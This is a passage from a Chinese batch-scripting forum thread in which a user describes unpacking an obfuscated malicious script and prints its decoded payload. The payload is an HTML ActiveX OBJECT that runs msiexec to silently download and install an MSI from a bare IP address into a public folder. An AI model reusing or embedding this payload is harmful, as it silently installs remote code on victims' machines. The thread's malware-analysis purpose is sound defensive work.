批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程
[批处理文件精品]批处理版照片整理器[批处理文件精品]纯批处理备份&还原驱动在线第三方下载
返回列表 发帖
看了一下,这里面不仅有 变量名替换 和 操作符替换,还有一个内部脚本解释器
最麻烦的是,每一个模块就有1~3个内部脚本解释器,因此还原需要时间
不过还原也只是时间问题

TOP

花了2小时破掉了它的壳,然后发现了作者满满的恶意

注意:灰色行上面其实都是解密数据用的代码!灰色行才是重点(然后我就傻傻地研究了半个下午)
附件: 您需要登录才可以下载或查看附件。没有帐号?注册

TOP

_0x4cb366 的值:
  1. <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=",msiexec.exe,/i http://180.215.222.242/11923.msi /quiet TARGETDIR=C:\Users\Public\Downloads\UpdataLogs"><PARAM name="Item2" value="273,1,1"></OBJECT>
复制代码
应该看的出来是什么吧

TOP

返回列表